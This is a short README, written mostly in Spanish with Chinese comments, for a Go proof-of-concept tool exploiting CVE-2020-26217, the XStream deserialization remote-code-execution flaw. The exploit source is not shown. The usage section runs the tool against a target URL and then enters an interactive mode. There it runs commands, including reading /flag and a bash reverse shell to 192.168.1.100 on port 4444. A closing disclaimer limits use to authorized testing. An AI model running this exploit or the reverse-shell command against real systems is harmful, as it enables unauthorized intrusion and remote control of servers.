
CVE-2020-26217 PoC de deserialización de XStream
Herramienta de explotación de la vulnerabilidad de ejecución remota de código en XStream.
CVE-2020-26217 es una vulnerabilidad de deserialización en la librería XStream que permite a un atacante ejecutar código remoto mediante la construcción de datos XML maliciosos.
Versiones afectadas: XStream <= 1.4.13
go run poc.go <目标URL>
# 运行工具
go run poc.go http://target.com:8080/?data
# 进入交互模式后输入命令
cmd> whoami
cmd> cat /flag
cmd> bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
cmd> exit
go build -o poc poc.go
Esta herramienta está destinada únicamente a la investigación de seguridad y pruebas autorizadas. No la utilice con fines ilegales. El usuario asume toda la responsabilidad legal correspondiente.